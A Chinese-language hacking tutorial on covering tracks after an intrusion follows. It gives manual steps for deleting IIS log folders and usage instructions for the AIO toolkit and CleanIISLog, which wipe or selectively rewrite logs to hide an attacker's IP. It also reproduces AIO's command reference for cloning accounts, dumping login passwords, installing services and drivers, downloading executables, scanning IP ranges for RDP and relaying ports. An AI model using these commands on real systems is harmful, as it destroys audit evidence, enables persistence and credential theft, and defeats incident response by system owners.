目录
入侵者在攻击过程或者在被控制计算机上执行的一些操作"痕迹"都会或多或少留在系统中,例如通过SQL注入时,如果Web服务器设置了日志记录,则该日志记录文件将会记录入侵的IP地址、时间、操作等信息,通过这些信息可以进行追踪、判断以及还原攻击过程,是入侵者留下的入侵证据,在网络攻防中习惯称为消除痕迹,也有人称之为"擦屁屁"。AIO是ALL In One的缩写,它是幻影的多种工具整合,拥有MT的功能,同时还有一些其它功能。AIO中的一个比较实用的功能是使用"AIO -CleanLog"命令来清除系统中的所有日志,该功能主要用来删除在入侵或者操作时被系统软件所记录的日志文件
0x00 IIS 日志存放在什么地方
IIS存放日志文件的默认存储路径是c:\windows\system32\logfiles
我们依次打开我的电脑-C盘-Windows文件夹-system32文件夹-logfiles文件夹
,发现里面还有多个子文件夹,每个文件夹都对应一个IIS站点。我们逐个打开这些文件夹查看,发现里面有大量以.log
后缀结尾的文件,这就是IIS日志文件。日志文件夹以“W3SVC”进行命名,如果有多个网站目录,则会存在多个“W3SVC”目录。
0x01 手动清除
1.关闭服务 net stop w3svc
2.cd 到c:\windows\system32\logfiles\W3SVC
3.del *.*
4.开启 w3svc 服务 :net start w3svc
0x01 aio.exe 的使用方法
All In One(AIO) V1.0 Build 06/10/2006 By WinEggDrop(www.ph4nt0m.org)
这是一个将很多小工具功能集成一体的一个"工具".
(如果你使用的是Build 04/01/2006版本,那版本中的syn扫描因编译时原因有些问题,请更新为Build 06/10/2006版本)
功能:
1.AutoRun -> 查看一般登陆后启动的项
用法:Aio.exe -AutoRun
2.Clone -> 克隆帐户
用法: Aio.exe -Clone 正常帐号 要被克隆帐户 密码
例子: Aio.exe -Clone Administrator Guest test
帮助: Aio.exe -Clone
不需要在system权限下也可用
3.CheckClone -> 检测克隆帐户
用法: Aio.exe -CheckClone
不需要在system权限下也可用
4.CleanLog -> 清除日志
用法: Aio.exe -CleanLog
5.ConfigService -> 修改服务的启动类型
用法: Aio.exe -ConfigService 服务器 启动类型
例子: Aio.exe -ConfigService W3svc Demand ->手动启动
例子: Aio.exe -ConfigService W3svc Auto ->自动启动
例子: Aio.exe -ConfigService W3svc Disabled ->禁止启动
帮助: Aio.exe -ConfigService
6.DelUser -> 删除系统帐户
用法: Aio.exe -DelUser 帐户
例子: Aio.exe -DelUser Guest
帮助: Aio.exe -DelUser
(注意: 可以删除系统内建帐号,象Administrator,Guest等,小心使用)
7.EnumService -> 列举系统服务
用法: Aio -EnumService All|Running|Stopped
例子: Aio -EnumService All -> 列举所有服务
例子: Aio -EnumService Running -> 列举正在运行的服务
例子: Aio -EnumService Stopped -> 列举停止了的服务
帮助: Aio -EnumService
8.FHS -> 检查系统隐藏服务
用法: Aio.exe -FHS
9.FGet -> FTP下载
用法: Aio.exe -FGet FTP地址 端口 用户名 密码 要下载文件名
例子: Aio.exe -FGet 12.12.12.12 21 test test a.exe
例子: Aio.exe -FGet 12.12.12.12 21 test test *.exe (下载所有exe文件)
帮助: Aio.exe -FGet
10.FindPassword -> 得到NT/2K所有登陆系统用户密码
用法: Aio.exe -FindPassword
11.InstallService -> 安装服务
用法: Aio.exe -InstallService 服务名 文件名
例子: Aio.exe -InstallService test test.exe
帮助: Aio.exe -InstallService
11.InstallService -> 安装驱动
用法: Aio.exe -InstallDrver 服务名 驱动文件名
例子: Aio.exe -InstallDriver test test.sys
帮助: Aio.exe -InstallDriver
12.KillTCP -> 杀掉一个TCP连接
用法: Aio.exe -KillTCP 本地IP 本地端口 远程地址 远程端口
例子: Aio.exe -KillTCP 192.168.1.1 80 61.61.61.61 7890
帮助: Aio.exe -KillTCP
(参数可以通过netstat -an得到)
13.LogOff -> 注销系统
用法: Aio.exe -LogOff
14.MGet -> HTTP下载文件
用法: Aio.exe -MGet URL <保存为文件名>
例子: Aio.exe -MGet http://www.abc.com/test.exe abc.exe
帮助: Aio.exe -MGet
15.MPort -> 端口和程序关连映射
用法: Aio.exe -Mport
16.Never -> 将系统帐户登陆次数重置为0
用法: Aio.exe -Never 帐户
例子: Aio.exe -Never Guest
帮助: Aio.exe -Never
17.PowerOff -> 关机,关电源
用法: Aio.exe -PowerOff
18.Pslist -> 列进程
用法: Aio.exe -Pslist
19.Pskill -> 杀进程
用法: Aio.exe -Pskill PID|进程名
例子: Aio.exe -Pskill 3465
例子: Aio.exe -Pskill Iexplore
20.PortScan -> 端口扫描(Syn和TCP扫描)
用法: Aio.exe -PortScan Syn|TCP -S 起始地址 -E 终止地址 -P 端口列表 -T 线程数 </Banner> </TS> </S5> </Save>
例子: Aio.exe -PortScan Syn -S 61.129.1.1 -E 61.129.1.255 -P 3389 -T 512 /TS -> 扫描61.129.1.1到61.129.1.255的主机的3389端口,检查是否打开的是终端
例子: Aio.exe -PortScan Syn -S 61.129.12.12 -P 1-65535 -T 512 /TS -> 扫描61.129.12.12主机65535个端口,检查哪个端口打开的终端服务
例子: Aio.exe -PortScan Syn -S 61.129.12.12 -P 1-65535 -T 512 /S5 -> 扫描61.129.12.12主机65535个端口,检查哪个端口打开的Socks5服务
帮助: Aio.exe -PortScan
(更多用法,请参考我发布的SynScan)
这个功能的用法是最多的,而且也是很强大的.(Syn扫描只适用于2K或以上系统)
21.PortRelay -> TCP数据转发
用法: Aio.exe -PortRelay 本地绑定端口 转发至的IP 转发至端口
例子: Aio.exe -PortRelay 3389 211.12.12.12 3389
帮助: Aio.exe -PortRelay
22.Reboot -> 重启系统
用法: Aio.exe -Reboot
23.RemoveService -> 删除服务
用法: Aio.exe -RemoveService 要删除的服务
例子: Aio.exe -RemoveService test
帮助: Aio.exe -RemoveService
24.StartService -> 启动服务
用法: Aio.exe -StartService 要启动的服务
例子: Aio.exe -StartService test
帮助: Aio.exe -StartService
25.StopService -> 停止服务
用法: Aio.exe -StopService 要停止的服务
例子: Aio.exe -StopService Test
帮助: Aio.exe -StopService
26.Sysinfo -> 查看系统信息
用法: Aio.exe -Sysinfo
27.ShutDown -> 关机
用法: Aio.exe -ShutDown
28.Terminal -> 安装终端服务(2K/XP/2003中都适用)
用法: Aio.exe -Terminal 端口
例子: Aio.exe -Terminal 3389
帮助: Aio.exe -Terminal
29.Unhide -> 查看星号密码(NT系统有效)
用法: Aio.exe -Unhide
30.WinInfo -> 查看帐户信息等
用法: Aio.exe -WinInfo <帐户>
例子: Aio.exe -WinInfo
例子: Aio.exe -WinInfo Guest
0x02 使用AIO 清除IIS日志
执行清除日志命令。输入AIO.exe -CleanLog
命令后,AIO程序会自动清除系统中的IIS日志、Ftp日志、应用程序日志、安全日志等。清除时,会给出相应的提示,如图所示。
AIO在清除日志完毕后会提示任务完成Mission Accomplished
。
再次打开路径c:\windows\system32\
发现IIS日志记录文件夹logfiles
已经被删除。
至此已经清除了入侵过程或者在被控制计算机上进行操作的一些日志记录,除非使用一些恢复软件,一般用户是找不到入侵痕迹的。
0x03 使用CleanIISLog清除IIS日志
CleanIISLog是由小榕写的一个清除IIS LOG记录的工具。它除了可以直接清除所有的IIS日志外,还可以清除指定的的IP连接记录而保留其他IP记录;以及当清除成功后,CleanIISLog会在系统日志中将本身的运行记录清除,CleanIISLog只能在本地运行,而且必须具有Administrators权限。
CleanIISLog使用方法:
用法为:CleanIISLog <LogFile>|<.> <CleanIP>
<LogFile>: 指定要处理的日志文件,如果指定为“.”,则处理所有的日志文件,如果是处理所有日志文件,则需要较长时间。
<CleanIP>: 指定要清除的IP记录,如果指定为“.”,则清除所有的IP记录。 在前面的案例中,讲述了如何利用AIO软件来清除系统中的日志文件,AIO清除日志文件采用的是直接删除。管理员或者安全人员利用恢复软件可以将被删除的日志记录恢复,从而从中获取入侵者的攻击等日志信息。本案例则是采用“重写”或者“替代”方式将一些敏感信息替换掉,彻底的清除了留在日志文件中的痕迹。
例如:
CleanIISLog C:\WINDOWS\system32\Logfiles\MSFTPSVC1\ex180505.log 127.0.0.1
将IIS该日志文件中ip地址为127.0.0.1相关的记录全部删除